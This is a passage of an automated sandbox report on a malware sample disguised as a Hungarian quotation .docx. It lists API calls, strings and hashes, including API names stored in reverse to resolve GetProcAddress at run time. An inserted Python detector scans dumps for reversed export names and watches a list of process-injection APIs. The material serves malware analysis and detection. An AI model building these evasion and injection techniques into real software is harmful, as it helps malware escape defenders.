• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: Message
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
• API String ID: 2030045667-32948583
• Opcode ID: 415dccf798f71488c712eeb470f115a0659d56a7caf1abba4faa1c4fabd2b3f3
• Instruction ID: 6c04a4c821950daf8b5fc38fbbbdd27baf3c36b5f4d50cdf5973bece30737bd2
• Opcode Fuzzy Hash: 415dccf798f71488c712eeb470f115a0659d56a7caf1abba4faa1c4fabd2b3f3
• Instruction Fuzzy Hash: CCA10330E043648BDB21AB2CCCA0B98B7E9FB49754F1440E5ED49AB285CB759AC5CFD1
Strings
• The unexpected small block leaks are:, xrefs: 029A2707
• Unexpected Memory Leak, xrefs: 029A28C0
• An unexpected memory leak has occurred. , xrefs: 029A2690
• bytes: , xrefs: 029A275D
• 7, xrefs: 029A26A1
• , xrefs: 029A2814
• The sizes of unexpected leaked medium and large blocks are: , xrefs: 029A2849
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID:
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
• API String ID: 0-2723507874
• Opcode ID: 2d918ff319598b46bafdf7e61cbdba34f01cf978890530065d821c2d74ddd4bc
• Instruction ID: a7db0f9578b14423e4017da2fa48454f4e06718ee3aca4d4b834f1539aa221b1
• Opcode Fuzzy Hash: 2d918ff319598b46bafdf7e61cbdba34f01cf978890530065d821c2d74ddd4bc
• Instruction Fuzzy Hash: 2D71B230E043A88FDB219B2CCC94BD9BBE9FB49754F1040E5E9499B281DB758AC5CF91
APIs
• GetThreadLocale.KERNEL32(00000000,029AC08B,?,?,00000000,00000000), ref: 029ABDF6
  • Part of subcall function 029AA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029AA7E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 4232894706-2493093252
• Opcode ID: 7bbd213b2b6c6fbaba6b51ff55ab00af207d67acf2cf8f390b7fc4c936d545fa
• Instruction ID: a1bb6503ff313fc01f084d140bf44c6dbc19d2a098a9b02769452bb506376811
• Opcode Fuzzy Hash: 7bbd213b2b6c6fbaba6b51ff55ab00af207d67acf2cf8f390b7fc4c936d545fa
• Instruction Fuzzy Hash: B2611C34B013589BDB00EBA8D871A9FB7FB9BD8700F509875A1019B645DA39D90ACFD1
                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029A4423,?,?,02A267C8,?,?,029CE7A8,029A65B1,029CD30D), ref: 029A4395
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029A4423,?,?,02A267C8,?,?,029CE7A8,029A65B1,029CD30D), ref: 029A439B
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,029A43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029A4423,?,?,02A267C8), ref: 029A43B0
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,029A43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029A4423,?,?), ref: 029A43B6
                                                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029A43D4
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                                                  • API String ID: 1570097196-2970929446
                                                                                                                                                  • Opcode ID: 04ea14d2e4f9165bbda0e3d1f94789aa820fd44a78903f75b06d14730d5cbe5d
                                                                                                                                                  • Instruction ID: 54003ca8366ecb17b308408c6b31376f9dab2068c5eadb2964613584a9f77028
                                                                                                                                                  • Opcode Fuzzy Hash: 04ea14d2e4f9165bbda0e3d1f94789aa820fd44a78903f75b06d14730d5cbe5d
                                                                                                                                                  • Instruction Fuzzy Hash: 46F0B464AC934079F720B6A46D66F69775C47C8F25F200A19F366A80C1DFE480C99BA3
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029AAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 029AAD59
                                                                                                                                                    • Part of subcall function 029AAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 029AAD7D
                                                                                                                                                    • Part of subcall function 029AAD3C: GetModuleFileNameA.KERNEL32(029A0000,?,00000105), ref: 029AAD98
                                                                                                                                                    • Part of subcall function 029AAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 029AAE2E
                                                                                                                                                  • CharToOemA.USER32(?,?), ref: 029AAEFB
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 029AAF18
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029AAF1E
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,029AAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029AAF33
                                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,029AAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 029AAF39
                                                                                                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 029AAF5B
                                                                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 029AAF71
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 185507032-0
                                                                                                                                                  • Opcode ID: efd958a7210536722059b276e6b500e5e2f9ce8267601b592a5601e45b4afc0f
                                                                                                                                                  • Instruction ID: 2bd65f6fb5582290110d48e3f9523b618dd277c18324a380a742e35ecf35d6cd
                                                                                                                                                  • Opcode Fuzzy Hash: efd958a7210536722059b276e6b500e5e2f9ce8267601b592a5601e45b4afc0f
                                                                                                                                                  • Instruction Fuzzy Hash: B5115AB2958300BAD700FBA8CC95F9F77FDAB85700F854925BB44D60E0DA74E904CBA2
                                                                                                                                                  APIs
                                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 029AE625
                                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 029AE641
                                                                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 029AE67A
                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 029AE6F7
                                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 029AE710
                                                                                                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 029AE745
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 351091851-0
                                                                                                                                                  • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                  • Instruction ID: b5392193d6694debab726f41a109d7f0c0c2d10b6a97769dc9447202a552d6bb
                                                                                                                                                  • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                  • Instruction Fuzzy Hash: F351ED7590172D9BCB26DF58CCA0BD9B3BDAF49300F0045E5E949E7211DA30AF858FA1
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029A35BA
                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029A3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029A35ED
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,029A3610,00000000,?,00000004,00000000,029A3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029A3603
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                  • API String ID: 3677997916-4173385793
                                                                                                                                                  • Opcode ID: 91fa70922864e26703a952cb622f7fc35596d488cbe2ba77b37717828c4d2c2d
                                                                                                                                                  • Instruction ID: b0537ae4a7d123008dd912ee753512c561522fdef9704059b588f3f3b63f0e8f
                                                                                                                                                  • Opcode Fuzzy Hash: 91fa70922864e26703a952cb622f7fc35596d488cbe2ba77b37717828c4d2c2d
                                                                                                                                                  • Instruction Fuzzy Hash: 7101B575944358BAEB11DF948D12BBDB7ECD748B10F1005A1BE05D6680E674A910CAD9
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                  • String ID: Kernel32$sserddAcorPteG
                                                                                                                                                  • API String ID: 667068680-1372893251
                                                                                                                                                  • Opcode ID: 59efb3abbbfc021c8154204960ecfd2d3de4a4235b3288534bcc64ddf4058925
                                                                                                                                                  • Instruction ID: f0a893e20bbe3edb9a3d0a7442b8abd70462d93063828875d8683db23b0e6db3
                                                                                                                                                  • Opcode Fuzzy Hash: 59efb3abbbfc021c8154204960ecfd2d3de4a4235b3288534bcc64ddf4058925
                                                                                                                                                  • Instruction Fuzzy Hash: 2E014475640304AFEB11EFA8DD61E9EB7EEFBCDB00F514460E800D7640DA70AA05CE64
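                                                                                                                                                   The function above resolves an export at run time by calling GetModuleHandleW("Kernel32") and then GetProcAddress, and the String ID shows the export name stored backwards: "sserddAcorPteG" is "GetProcAddress" reversed. Reversed import names are a cheap way to keep the target API out of the import table and out of a plain `strings` pass. The script below is an analyst aid added to this page; it is not part of the Joe Sandbox report or of the sample's code. It scans a memory dump (or any byte blob) for watched Win32 export names in both plain and reversed form, in ASCII and UTF-16LE, and reports which forms occur. Only GetProcAddress is taken from the report; the other names in WATCHED_APIS and the sample blob are constructed for illustration.

```python
"""Scan a memory dump for Win32 export names stored reversed (e.g. "sserddAcorPteG")."""
from __future__ import annotations

from typing import Iterable, Iterator

# Export names to look for. GetProcAddress is the one the report shows reversed;
# the rest are commonly abused neighbours added here as an assumption, not
# something this report lists.
WATCHED_APIS: tuple[str, ...] = (
    "GetProcAddress",
    "LoadLibraryA",
    "LoadLibraryW",
    "VirtualAlloc",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "CreateRemoteThread",
    "NtUnmapViewOfSection",
    "SetThreadContext",
    "ResumeThread",
)

# Constructed sample blob mimicking a slice of loader data: module name in
# clear, the export spelled backwards, then some non-printable bytes.
# These are not bytes from the actual dump.
SAMPLE_BLOB: bytes = (
    b"\x00\x00Kernel32\x00\x00\x00"   # offsets 0..12
    b"sserddAcorPteG\x00"             # reversed "GetProcAddress" at offset 13
    b"KernelBASE\x00"
    b"\x90\x90\xcc\xcc"
)


def _find_all(blob: bytes, needle: bytes) -> Iterator[int]:
    """Yield every offset at which `needle` occurs in `blob` (overlaps allowed)."""
    start = 0
    while (idx := blob.find(needle, start)) != -1:
        yield idx
        start = idx + 1


def reversed_api_hits(blob: bytes, names: Iterable[str] = WATCHED_APIS) -> list[tuple[int, str, str]]:
    """Return (offset, encoding, export_name) for each reversed export name found.

    Both narrow (ASCII) and wide (UTF-16LE) spellings are checked, because
    Delphi and Win32 code may store either. Sorted by offset.
    """
    hits: list[tuple[int, str, str]] = []
    for name in names:
        reversed_name = name[::-1]
        for encoding, needle in (("ascii", reversed_name.encode("ascii")),
                                 ("utf16", reversed_name.encode("utf-16-le"))):
            hits.extend((off, encoding, name) for off in _find_all(blob, needle))
    return sorted(hits)


def api_name_forms(blob: bytes, names: Iterable[str] = WATCHED_APIS) -> dict[str, set[str]]:
    """Map each watched export name present in `blob` to the forms it appears in.

    A name present only as "reversed" is the obfuscation indicator; a name
    present as "plain" would normally show up in strings/IAT anyway.
    """
    forms: dict[str, set[str]] = {}
    for name in names:
        for label, text in (("plain", name), ("reversed", name[::-1])):
            for enc in ("ascii", "utf-16-le"):
                if blob.find(text.encode(enc)) != -1:
                    forms.setdefault(name, set()).add(label)
    return forms


if __name__ == "__main__":
    for off, enc, name in reversed_api_hits(SAMPLE_BLOB):
        print(f"0x{off:08x} {enc:<6} reversed {name!r}")
    for name, present in api_name_forms(SAMPLE_BLOB).items():
        print(f"{name}: {sorted(present)}")
```

                                                                                                                                                   Point the functions at a .sdmp read with `open(path, "rb").read()`; a name that shows up only in the reversed set is worth cross-referencing against the GetProcAddress call sites the report lists. The watched names are all ten characters or longer, so a reversed match is very unlikely to be coincidental.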
                                                                                                                                                  APIs
                                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,029AAAE7,?,?,00000000), ref: 029AAA68
                                                                                                                                                    • Part of subcall function 029AA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029AA7E2
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,029AAAE7,?,?,00000000), ref: 029AAA98
                                                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 029AAAA3
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,029AAAE7,?,?,00000000), ref: 029AAAC1
                                                                                                                                                  • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 029AAACC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4102113445-0
                                                                                                                                                  • Opcode ID: 6489c091d83cd9dedab710e3390d036860a617e3c6494d4703ea49acfa83e08c
                                                                                                                                                  • Instruction ID: fcd563a897f3f83be385074dcb7917368dab1b0cb60e41b13a6c4d17dbd2417b
                                                                                                                                                  • Opcode Fuzzy Hash: 6489c091d83cd9dedab710e3390d036860a617e3c6494d4703ea49acfa83e08c
                                                                                                                                                  • Instruction Fuzzy Hash: 2D01A2B56003446FFB12AEA8CD31B6F77BEDBC5B10F514560E402A6AC0D6659E00CAE5
                                                                                                                                                  APIs
                                                                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,029AACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 029AAB2F
                                                                                                                                                    • Part of subcall function 029AA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029AA7E2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                                                                  • API String ID: 4232894706-1253427255
                                                                                                                                                  • Opcode ID: 9855b14fcd6a6941155ba2d7834952a667d84b6a926568ae599d78c4bd9249bc
                                                                                                                                                  • Instruction ID: 6eedd8d14bb9c44dcc7de0ab37b2c68dba4ee468ca3a40a5480be72a1ba20ef5
                                                                                                                                                  • Opcode Fuzzy Hash: 9855b14fcd6a6941155ba2d7834952a667d84b6a926568ae599d78c4bd9249bc
                                                                                                                                                  • Instruction Fuzzy Hash: 8941D2B07043544BEB12EB7988B46BEB3FBEFC5200B545929D452C3344EB64DD01CAE5
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B81CC: GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • RtlMoveMemory.NTDLL(?,?,?), ref: 029B7ED7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc$MemoryMove
                                                                                                                                                  • String ID: Ntdll$RtlM$oveM
                                                                                                                                                  • API String ID: 2705147948-1610840992
                                                                                                                                                  • Opcode ID: e7921aa75346ee3326d806f6fe7e2edc78acd1d431a90a6755669425a79ace45
                                                                                                                                                  • Instruction ID: 1e761a9b3084131a825c0fa956098a5a9de9f63451f3eccb8b42a5e258ab7f68
                                                                                                                                                  • Opcode Fuzzy Hash: e7921aa75346ee3326d806f6fe7e2edc78acd1d431a90a6755669425a79ace45
                                                                                                                                                  • Instruction Fuzzy Hash: 93017535684344BFF702DBD8DE16FEAB7D9EFC8B00F5104A0F801AA580CA70AE104A64
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,029B823C,?,?,00000000,?,029B7A7E,ntdll,00000000,00000000,029B7AC3,?,?,00000000), ref: 029B820A
                                                                                                                                                    • Part of subcall function 029B8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029B82FC,?,?,00000000,00000000,?,029B8215,00000000,KernelBASE,00000000,00000000,029B823C), ref: 029B82C1
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029B82C7
                                                                                                                                                    • Part of subcall function 029B8274: GetProcAddress.KERNEL32(?,?), ref: 029B82D9
                                                                                                                                                  • GetModuleHandleA.KERNELBASE(?), ref: 029B821E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule$AddressProc
                                                                                                                                                  • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                                  • API String ID: 1883125708-1952140341
                                                                                                                                                  • Opcode ID: 7fe202154cec35ed7270ae40e63b3cc2e9fb7a26df58c2677a0f7601e4f4f1f3
                                                                                                                                                  • Instruction ID: 2aa9c84b5c62eabd57f9d6d0afd7e47dd145d159b08d34e2c32edb4ccf5c14a1
                                                                                                                                                  • Opcode Fuzzy Hash: 7fe202154cec35ed7270ae40e63b3cc2e9fb7a26df58c2677a0f7601e4f4f1f3
